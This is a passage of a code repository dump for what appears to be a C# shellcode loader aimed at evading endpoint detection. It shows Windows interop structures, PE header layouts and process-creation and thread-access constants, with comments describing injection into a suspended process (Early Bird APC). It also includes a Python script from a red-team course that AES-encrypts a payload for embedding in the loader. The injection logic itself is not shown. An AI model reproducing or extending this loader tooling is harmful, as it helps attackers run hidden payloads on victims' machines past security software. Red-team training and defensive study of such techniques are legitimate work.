    IoPrivilegeFailed = 0xc0000137,
    OrdinalNotFound = 0xc0000138,
    EntryPointNotFound = 0xc0000139,
    ControlCExit = 0xc000013a,
    PortNotSet = 0xc0000353,
    DebuggerInactive = 0xc0000354,
    CallbackBypass = 0xc0000503,
    PortClosed = 0xc0000700,
    MessageLost = 0xc0000701,
    InvalidMessage = 0xc0000702,
    RequestCanceled = 0xc0000703,
    RecursiveDispatch = 0xc0000704,
    LpcReceiveBufferExpected = 0xc0000705,
    LpcInvalidConnectionUsage = 0xc0000706,
    LpcRequestsNotAllowed = 0xc0000707,
    ResourceInUse = 0xc0000708,
    ProcessIsProtected = 0xc0000712,
    VolumeDirty = 0xc0000806,
    FileCheckedOut = 0xc0000901,
    CheckOutRequired = 0xc0000902,
    BadFileType = 0xc0000903,
    FileTooLarge = 0xc0000904,
    FormsAuthRequired = 0xc0000905,
    VirusInfected = 0xc0000906,
    VirusDeleted = 0xc0000907,
    TransactionalConflict = 0xc0190001,
    InvalidTransaction = 0xc0190002,
    TransactionNotActive = 0xc0190003,
    TmInitializationFailed = 0xc0190004,
    RmNotActive = 0xc0190005,
    RmMetadataCorrupt = 0xc0190006,
    TransactionNotJoined = 0xc0190007,
    DirectoryNotRm = 0xc0190008,
    CouldNotResizeLog = 0xc0190009,
    TransactionsUnsupportedRemote = 0xc019000a,
    LogResizeInvalidSize = 0xc019000b,
    RemoteFileVersionMismatch = 0xc019000c,
    CrmProtocolAlreadyExists = 0xc019000f,
    TransactionPropagationFailed = 0xc0190010,
    CrmProtocolNotFound = 0xc0190011,
    TransactionSuperiorExists = 0xc0190012,
    TransactionRequestNotValid = 0xc0190013,
    TransactionNotRequested = 0xc0190014,
    TransactionAlreadyAborted = 0xc0190015,
    TransactionAlreadyCommitted = 0xc0190016,
    TransactionInvalidMarshallBuffer = 0xc0190017,
    CurrentTransactionNotValid = 0xc0190018,
    LogGrowthFailed = 0xc0190019,
    ObjectNoLongerExists = 0xc0190021,
    StreamMiniversionNotFound = 0xc0190022,
    StreamMiniversionNotValid = 0xc0190023,
    MiniversionInaccessibleFromSpecifiedTransaction = 0xc0190024,
    CantOpenMiniversionWithModifyIntent = 0xc0190025,
    CantCreateMoreStreamMiniversions = 0xc0190026,
    HandleNoLongerValid = 0xc0190028,
    NoTxfMetadata = 0xc0190029,
    LogCorruptionDetected = 0xc0190030,
    CantRecoverWithHandleOpen = 0xc0190031,
    RmDisconnected = 0xc0190032,
    EnlistmentNotSuperior = 0xc0190033,
    RecoveryNotNeeded = 0xc0190034,
    RmAlreadyStarted = 0xc0190035,
    FileIdentityNotPersistent = 0xc0190036,
    CantBreakTransactionalDependency = 0xc0190037,
    CantCrossRmBoundary = 0xc0190038,
    TxfDirNotEmpty = 0xc0190039,
    IndoubtTransactionsExist = 0xc019003a,
    TmVolatile = 0xc019003b,
    RollbackTimerExpired = 0xc019003c,
    TxfAttributeCorrupt = 0xc019003d,
    EfsNotAllowedInTransaction = 0xc019003e,
    TransactionalOpenNotAllowed = 0xc019003f,
    TransactedMappingUnsupportedRemote = 0xc0190040,
    TxfMetadataAlreadyPresent = 0xc0190041,
    TransactionScopeCallbacksNotSet = 0xc0190042,
    TransactionRequiredPromotion = 0xc0190043,
    CannotExecuteFileInTransaction = 0xc0190044,
    TransactionsNotFrozen = 0xc0190045,
    // Sentinel; not a real status code.
    MaximumNtStatus = 0xffffffff
}
/// <summary>
/// Verbatim duplicate of <c>AllocationProtect</c> (same PAGE_* winnt.h values). Nothing in this
/// file references it; it is presumably used by Program.cs. Keep the two in sync, or consolidate
/// on one of them once callers are known.
/// </summary>
public enum AllocationProtectEnum : uint
{
    PAGE_EXECUTE = 0x00000010,
    PAGE_EXECUTE_READ = 0x00000020,
    PAGE_EXECUTE_READWRITE = 0x00000040,
    PAGE_EXECUTE_WRITECOPY = 0x00000080,
    PAGE_NOACCESS = 0x00000001,
    PAGE_READONLY = 0x00000002,
    PAGE_READWRITE = 0x00000004,
    PAGE_WRITECOPY = 0x00000008,
    PAGE_GUARD = 0x00000100,
    PAGE_NOCACHE = 0x00000200,
    PAGE_WRITECOMBINE = 0x00000400
}
558 |
559 |
/// <summary>
/// Managed mirror of the MS-DOS stub header that begins every PE image (sequential layout).
/// The array fields are marshalled as fixed-size inline arrays so the struct keeps its native
/// size; <c>e_lfanew</c> is the offset of the NT headers that <c>IMAGE_NT_HEADERS64</c> models.
/// </summary>
[StructLayout(LayoutKind.Sequential)]
public struct IMAGE_DOS_HEADER
{
    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 2)]
    public char[] e_magic;      // Signature; "MZ" for a well-formed header
    public UInt16 e_cblp;       // Bytes on the last page of the file
    public UInt16 e_cp;         // Pages in the file
    public UInt16 e_crlc;       // Relocation count
    public UInt16 e_cparhdr;    // Header size in paragraphs
    public UInt16 e_minalloc;   // Minimum extra paragraphs needed
    public UInt16 e_maxalloc;   // Maximum extra paragraphs needed
    public UInt16 e_ss;         // Initial (relative) SS value
    public UInt16 e_sp;         // Initial SP value
    public UInt16 e_csum;       // Checksum
    public UInt16 e_ip;         // Initial IP value
    public UInt16 e_cs;         // Initial (relative) CS value
    public UInt16 e_lfarlc;     // File address of the relocation table
    public UInt16 e_ovno;       // Overlay number
    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
    public UInt16[] e_res1;     // Reserved words
    public UInt16 e_oemid;      // OEM identifier (for e_oeminfo)
    public UInt16 e_oeminfo;    // OEM information; e_oemid specific
    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
    public UInt16[] e_res2;     // Reserved words
    public Int32 e_lfanew;      // File offset of the NT ("PE\0\0") headers

    /// <summary><c>e_magic</c> as a string; an empty string when the array is null (default struct).</summary>
    private string _e_magic => new string(e_magic);

    /// <summary>True when the header carries the "MZ" signature.</summary>
    public bool isValid => _e_magic == "MZ";
}
594 |
595 |
596 |
/// <summary>
/// COFF file header that follows the "PE\0\0" signature (20 bytes, sequential layout).
/// Embedded in <c>IMAGE_NT_HEADERS64</c> at offset 4.
/// </summary>
[StructLayout(LayoutKind.Sequential)]
public struct IMAGE_FILE_HEADER
{
    public ushort Machine;              // Target machine identifier
    public ushort NumberOfSections;     // Number of section headers that follow the optional header
    public uint TimeDateStamp;          // Link time, seconds since the Unix epoch
    public uint PointerToSymbolTable;   // File offset of the COFF symbol table (0 when absent)
    public uint NumberOfSymbols;        // Entries in the symbol table
    public ushort SizeOfOptionalHeader; // Size in bytes of the optional header that follows
    public ushort Characteristics;      // IMAGE_FILE_* attribute flags
}
607 |
608 |
/// <summary>
/// One entry of the optional header's data-directory table: an RVA plus a byte size
/// (8 bytes, sequential layout). Sixteen of these are laid out in <c>IMAGE_OPTIONAL_HEADER64</c>.
/// </summary>
[StructLayout(LayoutKind.Sequential)]
public struct IMAGE_DATA_DIRECTORY
{
    public uint VirtualAddress; // RVA of the table, relative to the image base
    public uint Size;           // Size of the table in bytes
}
614 |
615 |
/// <summary>
/// PE32+ (64-bit) optional header with explicit field offsets. <c>Magic</c> is 0x20b for PE32+,
/// which <c>IMAGE_NT_HEADERS64.isValid</c> checks. Offsets 112..232 hold the sixteen
/// <c>IMAGE_DATA_DIRECTORY</c> entries in their standard order; <c>NumberOfRvaAndSizes</c> says
/// how many of them the image actually defines, so entries beyond that count should be treated
/// as absent when walking the headers.
/// </summary>
[StructLayout(LayoutKind.Explicit)]
public struct IMAGE_OPTIONAL_HEADER64
{
    [FieldOffset(0)]
    public ushort Magic;                    // 0x20b for PE32+
    [FieldOffset(2)]
    public byte MajorLinkerVersion;
    [FieldOffset(3)]
    public byte MinorLinkerVersion;
    [FieldOffset(4)]
    public uint SizeOfCode;
    [FieldOffset(8)]
    public uint SizeOfInitializedData;
    [FieldOffset(12)]
    public uint SizeOfUninitializedData;
    [FieldOffset(16)]
    public uint AddressOfEntryPoint;        // RVA of the entry point
    [FieldOffset(20)]
    public uint BaseOfCode;
    [FieldOffset(24)]
    public ulong ImageBase;                 // Preferred load address (8 bytes in PE32+)
    [FieldOffset(32)]
    public uint SectionAlignment;
    [FieldOffset(36)]
    public uint FileAlignment;
    [FieldOffset(40)]
    public ushort MajorOperatingSystemVersion;
    [FieldOffset(42)]
    public ushort MinorOperatingSystemVersion;
    [FieldOffset(44)]
    public ushort MajorImageVersion;
    [FieldOffset(46)]
    public ushort MinorImageVersion;
    [FieldOffset(48)]
    public ushort MajorSubsystemVersion;
    [FieldOffset(50)]
    public ushort MinorSubsystemVersion;
    [FieldOffset(52)]
    public uint Win32VersionValue;
    [FieldOffset(56)]
    public uint SizeOfImage;                // Total mapped size, a multiple of SectionAlignment
    [FieldOffset(60)]
    public uint SizeOfHeaders;
    [FieldOffset(64)]
    public uint CheckSum;
    [FieldOffset(68)]
    public ushort Subsystem;
    [FieldOffset(70)]
    public ushort DllCharacteristics;
    [FieldOffset(72)]
    public ulong SizeOfStackReserve;
    [FieldOffset(80)]
    public ulong SizeOfStackCommit;
    [FieldOffset(88)]
    public ulong SizeOfHeapReserve;
    [FieldOffset(96)]
    public ulong SizeOfHeapCommit;
    [FieldOffset(104)]
    public uint LoaderFlags;
    [FieldOffset(108)]
    public uint NumberOfRvaAndSizes;        // Count of valid data-directory entries below

    // Data directories, 8 bytes each, in the standard PE order.
    [FieldOffset(112)]
    public IMAGE_DATA_DIRECTORY ExportTable;
    [FieldOffset(120)]
    public IMAGE_DATA_DIRECTORY ImportTable;
    [FieldOffset(128)]
    public IMAGE_DATA_DIRECTORY ResourceTable;
    [FieldOffset(136)]
    public IMAGE_DATA_DIRECTORY ExceptionTable;
    [FieldOffset(144)]
    public IMAGE_DATA_DIRECTORY CertificateTable;   // File offset, not an RVA, for this entry
    [FieldOffset(152)]
    public IMAGE_DATA_DIRECTORY BaseRelocationTable;
    [FieldOffset(160)]
    public IMAGE_DATA_DIRECTORY Debug;
    [FieldOffset(168)]
    public IMAGE_DATA_DIRECTORY Architecture;
    [FieldOffset(176)]
    public IMAGE_DATA_DIRECTORY GlobalPtr;
    [FieldOffset(184)]
    public IMAGE_DATA_DIRECTORY TLSTable;
    [FieldOffset(192)]
    public IMAGE_DATA_DIRECTORY LoadConfigTable;
    [FieldOffset(200)]
    public IMAGE_DATA_DIRECTORY BoundImport;
    [FieldOffset(208)]
    public IMAGE_DATA_DIRECTORY IAT;
    [FieldOffset(216)]
    public IMAGE_DATA_DIRECTORY DelayImportDescriptor;
    [FieldOffset(224)]
    public IMAGE_DATA_DIRECTORY CLRRuntimeHeader;
    [FieldOffset(232)]
    public IMAGE_DATA_DIRECTORY Reserved;
}
754 |
755 |
/// <summary>
/// NT headers of a 64-bit PE image at the offset given by <c>IMAGE_DOS_HEADER.e_lfanew</c>:
/// the "PE\0\0" signature, the COFF file header and the PE32+ optional header, at explicit
/// offsets 0, 4 and 24.
/// </summary>
[StructLayout(LayoutKind.Explicit)]
public struct IMAGE_NT_HEADERS64
{
    [FieldOffset(0)]
    public UInt32 Signature;                        // "PE\0\0" read as a native-endian DWORD
    [FieldOffset(4)]
    public IMAGE_FILE_HEADER FileHeader;
    [FieldOffset(24)]
    public IMAGE_OPTIONAL_HEADER64 OptionalHeader;

    /// <summary>The signature decoded as four ASCII characters in native byte order.</summary>
    private string _Signature
    {
        get
        {
            byte[] raw = BitConverter.GetBytes(Signature);
            return Encoding.ASCII.GetString(raw);
        }
    }

    /// <summary>True when the signature reads "PE\0\0" and the optional header is PE32+ (Magic 0x20b).</summary>
    public bool isValid => _Signature == "PE\0\0" && OptionalHeader.Magic == 0x20b;
}
774 |
775 |
/// <summary>
/// IMAGE_SECTION_HEADER.Characteristics bits (the IMAGE_SCN_* values from winnt.h).
/// Two caveats for anyone testing these: the Align* members are a 4-bit field
/// (mask 0x00F00000), not independent bits, so HasFlag()/ToString() on them is
/// misleading -- mask and compare instead; and MemPurgeable and Memory16Bit
/// share the value 0x00020000 (winnt.h also defines both that way, as far as I
/// recall -- verify), so ToString() of that value is unspecified.
/// </summary>
[Flags]
public enum DataSectionFlags : uint
{
/// <summary>
/// Reserved for future use.
/// </summary>
TypeReg = 0x00000000,
/// <summary>
/// Reserved for future use.
/// </summary>
TypeDsect = 0x00000001,
/// <summary>
/// Reserved for future use.
/// </summary>
TypeNoLoad = 0x00000002,
/// <summary>
/// Reserved for future use.
/// </summary>
TypeGroup = 0x00000004,
/// <summary>
/// The section should not be padded to the next boundary. This flag is obsolete and is replaced by IMAGE_SCN_ALIGN_1BYTES. This is valid only for object files.
/// </summary>
TypeNoPadded = 0x00000008,
/// <summary>
/// Reserved for future use.
/// </summary>
TypeCopy = 0x00000010,
/// <summary>
/// The section contains executable code.
/// </summary>
ContentCode = 0x00000020,
/// <summary>
/// The section contains initialized data.
/// </summary>
ContentInitializedData = 0x00000040,
/// <summary>
/// The section contains uninitialized data.
/// </summary>
ContentUninitializedData = 0x00000080,
/// <summary>
/// Reserved for future use.
/// </summary>
LinkOther = 0x00000100,
/// <summary>
/// The section contains comments or other information. The .drectve section has this type. This is valid for object files only.
/// </summary>
LinkInfo = 0x00000200,
/// <summary>
/// Reserved for future use.
/// </summary>
TypeOver = 0x00000400,
/// <summary>
/// The section will not become part of the image. This is valid only for object files.
/// </summary>
LinkRemove = 0x00000800,
/// <summary>
/// The section contains COMDAT data. For more information, see section 5.5.6, COMDAT Sections (Object Only). This is valid only for object files.
/// </summary>
LinkComDat = 0x00001000,
/// <summary>
/// Reset speculative exceptions handling bits in the TLB entries for this section.
/// </summary>
NoDeferSpecExceptions = 0x00004000,
/// <summary>
/// The section contains data referenced through the global pointer (GP).
/// </summary>
RelativeGP = 0x00008000,
/// <summary>
/// Reserved for future use. Same value as Memory16Bit (see type summary).
/// </summary>
MemPurgeable = 0x00020000,
/// <summary>
/// Reserved for future use. Same value as MemPurgeable (see type summary).
/// </summary>
Memory16Bit = 0x00020000,
/// <summary>
/// Reserved for future use.
/// </summary>
MemoryLocked = 0x00040000,
/// <summary>
/// Reserved for future use.
/// </summary>
MemoryPreload = 0x00080000,
/// <summary>
/// Align data on a 1-byte boundary. Valid only for object files.
/// (Align* values are an encoded 4-bit field, not single bits.)
/// </summary>
Align1Bytes = 0x00100000,
/// <summary>
/// Align data on a 2-byte boundary. Valid only for object files.
/// </summary>
Align2Bytes = 0x00200000,
/// <summary>
/// Align data on a 4-byte boundary. Valid only for object files.
/// </summary>
Align4Bytes = 0x00300000,
/// <summary>
/// Align data on an 8-byte boundary. Valid only for object files.
/// </summary>
Align8Bytes = 0x00400000,
/// <summary>
/// Align data on a 16-byte boundary. Valid only for object files.
/// </summary>
Align16Bytes = 0x00500000,
/// <summary>
/// Align data on a 32-byte boundary. Valid only for object files.
/// </summary>
Align32Bytes = 0x00600000,
/// <summary>
/// Align data on a 64-byte boundary. Valid only for object files.
/// </summary>
Align64Bytes = 0x00700000,
/// <summary>
/// Align data on a 128-byte boundary. Valid only for object files.
/// </summary>
Align128Bytes = 0x00800000,
/// <summary>
/// Align data on a 256-byte boundary. Valid only for object files.
/// </summary>
Align256Bytes = 0x00900000,
/// <summary>
/// Align data on a 512-byte boundary. Valid only for object files.
/// </summary>
Align512Bytes = 0x00A00000,
/// <summary>
/// Align data on a 1024-byte boundary. Valid only for object files.
/// </summary>
Align1024Bytes = 0x00B00000,
/// <summary>
/// Align data on a 2048-byte boundary. Valid only for object files.
/// </summary>
Align2048Bytes = 0x00C00000,
/// <summary>
/// Align data on a 4096-byte boundary. Valid only for object files.
/// </summary>
Align4096Bytes = 0x00D00000,
/// <summary>
/// Align data on an 8192-byte boundary. Valid only for object files.
/// </summary>
Align8192Bytes = 0x00E00000,
/// <summary>
/// The section contains extended relocations.
/// </summary>
LinkExtendedRelocationOverflow = 0x01000000,
/// <summary>
/// The section can be discarded as needed.
/// </summary>
MemoryDiscardable = 0x02000000,
/// <summary>
/// The section cannot be cached.
/// </summary>
MemoryNotCached = 0x04000000,
/// <summary>
/// The section is not pageable.
/// </summary>
MemoryNotPaged = 0x08000000,
/// <summary>
/// The section can be shared in memory.
/// </summary>
MemoryShared = 0x10000000,
/// <summary>
/// The section can be executed as code.
/// </summary>
MemoryExecute = 0x20000000,
/// <summary>
/// The section can be read.
/// </summary>
MemoryRead = 0x40000000,
/// <summary>
/// The section can be written to.
/// </summary>
MemoryWrite = 0x80000000
}
948 |
949 |
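/// <summary>
/// PE section table entry (winnt.h IMAGE_SECTION_HEADER, 40 bytes). Offsets
/// below match the on-disk/in-memory layout; the struct is meant to be
/// marshaled out of a loaded module's header.
/// </summary>
[StructLayout(LayoutKind.Explicit)]
public struct IMAGE_SECTION_HEADER
{
    /// <summary>
    /// Raw 8-byte section name: NUL-padded, and NOT NUL-terminated when all
    /// 8 bytes are used. NOTE(review): assumes this struct's default CharSet
    /// (Ansi) so each char marshals as one byte -- with a Unicode CharSet the
    /// 8 chars would span 16 bytes and overlap VirtualSize; confirm if the
    /// attribute is ever changed.
    /// </summary>
    [FieldOffset(0)]
    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
    public char[] Name;

    /// <summary>Size of the section once mapped (Misc.VirtualSize).</summary>
    [FieldOffset(8)]
    public UInt32 VirtualSize;

    /// <summary>RVA of the section relative to the image base.</summary>
    [FieldOffset(12)]
    public UInt32 VirtualAddress;

    /// <summary>Size of the section's initialized data on disk.</summary>
    [FieldOffset(16)]
    public UInt32 SizeOfRawData;

    /// <summary>File offset of the section's raw data.</summary>
    [FieldOffset(20)]
    public UInt32 PointerToRawData;

    [FieldOffset(24)]
    public UInt32 PointerToRelocations;

    [FieldOffset(28)]
    public UInt32 PointerToLinenumbers;

    [FieldOffset(32)]
    public UInt16 NumberOfRelocations;

    [FieldOffset(34)]
    public UInt16 NumberOfLinenumbers;

    /// <summary>IMAGE_SCN_* bits; see <see cref="DataSectionFlags"/>.</summary>
    [FieldOffset(36)]
    public DataSectionFlags Characteristics;

    /// <summary>
    /// Section name with the NUL padding stripped, so equality checks such as
    /// <c>hdr.Section == ".text"</c> work. Previously the padding was kept in
    /// the returned string, so such comparisons never matched; a name that
    /// fills all 8 bytes is returned unchanged. A default (null) Name yields "".
    /// </summary>
    public string Section{
        get { return new string(Name).TrimEnd('\0'); }
    }
}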
987 |
988 |
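/// <summary>
/// Win32 STARTUPINFO passed to CreateProcess*. Layout is declared Sequential
/// explicitly (it is the default for a C# struct, but PROCESS_INFORMATION in
/// this file spells it out, and interop structs should not rely on defaults).
/// The caller must set <see cref="cb"/> to Marshal.SizeOf of this struct
/// before the call (104 bytes on x64, 68 on x86).
/// NOTE(review): the three string fields marshal according to THIS struct's
/// CharSet (default Ansi), not the P/Invoke's -- only safe with the ANSI
/// CreateProcessA or when they are left null; confirm against the DllImport
/// in Program.cs.
/// </summary>
[StructLayout(LayoutKind.Sequential)]
public struct STARTUPINFO
{
    /// <summary>Size of this structure in bytes; must be filled in by the caller.</summary>
    public Int32 cb;
    public string lpReserved;
    public string lpDesktop;
    public string lpTitle;
    public Int32 dwX;
    public Int32 dwY;
    public Int32 dwXSize;
    public Int32 dwYSize;
    public Int32 dwXCountChars;
    public Int32 dwYCountChars;
    public Int32 dwFillAttribute;
    /// <summary>STARTF_* bits saying which of the fields above/below are valid.</summary>
    public Int32 dwFlags;
    public Int16 wShowWindow;
    public Int16 cbReserved2;
    public IntPtr lpReserved2;
    public IntPtr hStdInput;
    public IntPtr hStdOutput;
    public IntPtr hStdError;
}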
1010 |
1011 |
/// <summary>
/// Win32 PROCESS_INFORMATION filled in by CreateProcess*: handles and ids of
/// the new process and its initial thread. NOTE(review): the two handles are
/// owned by the caller and should be closed with CloseHandle once the
/// injection/resume sequence is done -- confirm Program.cs does so.
/// </summary>
[StructLayout(LayoutKind.Sequential)]
public struct PROCESS_INFORMATION
{
    /// <summary>Handle to the created process.</summary>
    public IntPtr hProcess;
    /// <summary>Handle to its primary thread (still suspended if CREATE_SUSPENDED was used).</summary>
    public IntPtr hThread;
    public int dwProcessId;
    public int dwThreadId;
}
1020 |
1021 |
/// <summary>
/// CreateProcess dwCreationFlags values used by this project. Only
/// CREATE_SUSPENDED is needed here: the target is started suspended so the
/// payload can be placed before its first instruction runs (presumably the
/// Early Bird APC path listed in the README -- confirm in Program.cs).
/// </summary>
public static class CreationFlags
{
    /// <summary>CREATE_SUSPENDED (winnt.h value 0x00000004).</summary>
    public const uint SUSPENDED = 0x4;
}
1026 |
1027 |
/// <summary>
/// Thread access rights used when opening a thread. Only THREAD_SET_CONTEXT
/// is defined; presumably the minimum needed to queue the APC / change the
/// context of the suspended thread -- confirm against the OpenThread /
/// NtOpenThread call in Program.cs.
/// </summary>
public enum ThreadAccess : int
{
    /// <summary>THREAD_SET_CONTEXT (0x0010).</summary>
    SET_CONTEXT = 0x0010
}
1032 |
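// NtAllocateVirtualMemory / NtProtectVirtualMemory constants (values as in winnt.h).
// Declared const rather than static readonly: they are fixed Win32 values and
// CreationFlags.SUSPENDED in this file already uses const, so this is the
// consistent form. Existing callers that only read the values are unaffected.
/// <summary>MEM_COMMIT: commit physical storage for the pages.</summary>
public const UInt32 MEM_COMMIT = 0x1000;
/// <summary>MEM_RESERVE: reserve address space without committing.</summary>
public const UInt32 MEM_RESERVE = 0x2000;
/// <summary>PAGE_EXECUTE_READ (RX) -- the protection to switch to after writing, so no page is ever W+X.</summary>
public const UInt32 PAGE_EXECUTE_READ = 0x20;
/// <summary>PAGE_READWRITE (RW) -- the protection to allocate with while the payload is being written.</summary>
public const UInt32 PAGE_READWRITE = 0x04;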
1037 |
1038 | }
1039 | }
1040 |
--------------------------------------------------------------------------------
/aes.py:
--------------------------------------------------------------------------------
1 | # Red Team Operator course code template
2 | # payload encryption with AES
3 | #
4 | # author: reenz0h (twitter: @SEKTOR7net)
5 |
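import sys
from base64 import b64encode
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
from Crypto.Random import get_random_bytes
import hashlib

# Fresh 16-byte secret for every run. What gets printed below is this
# pre-hash secret; the actual AES key is sha256(KEY) (see `cipher`), so the
# C# side must apply the same SHA-256 step before decrypting.
KEY = get_random_bytes(16)

# NOTE(review): fixed all-zero IV. Only tolerable because each run draws a new
# KEY and encrypts a single blob -- never reuse a printed key for a second
# payload. Changing it to a random IV also requires changing the C# decryptor.
iv = 16 * b'\x00'

# AES-256-CBC, unauthenticated: a corrupted or tampered blob is detected, at
# best, as a padding error on the decrypting side. Fine for obfuscating a
# payload, not a substitute for integrity protection.
cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)

try:
    # `with` so the file handle is released even if read() raises.
    with open(sys.argv[1], "rb") as payload:
        plaintext = payload.read()
except IndexError:
    # No path given at all.
    print("File argument needed! %s " % sys.argv[0], file=sys.stderr)
    sys.exit(1)
except OSError as exc:
    # Path given but unreadable: report the real cause instead of the
    # misleading "argument needed" message, and exit non-zero.
    print("Cannot read %s: %s" % (sys.argv[1], exc), file=sys.stderr)
    sys.exit(1)

ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))

# Base64 so both values paste straight into the C# source.
encoded_key = b64encode(KEY).decode('utf-8')
encoded_cipher = b64encode(ciphertext).decode('utf-8')

# Output format is unchanged (the README screenshots show these two lines).
print("Base64 Encoded Key:", encoded_key)
print("Base64 Encoded Ciphertext:", encoded_cipher)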
--------------------------------------------------------------------------------
/assets/edr1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProcessusT/SharpVenoma/0adfcdbdb44d1c4bee88d7c222ea0d3935d47a5b/assets/edr1.png
--------------------------------------------------------------------------------
/assets/edr2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProcessusT/SharpVenoma/0adfcdbdb44d1c4bee88d7c222ea0d3935d47a5b/assets/edr2.png
--------------------------------------------------------------------------------
/assets/payload_encode.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProcessusT/SharpVenoma/0adfcdbdb44d1c4bee88d7c222ea0d3935d47a5b/assets/payload_encode.png
--------------------------------------------------------------------------------
/assets/payload_update.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProcessusT/SharpVenoma/0adfcdbdb44d1c4bee88d7c222ea0d3935d47a5b/assets/payload_update.png
--------------------------------------------------------------------------------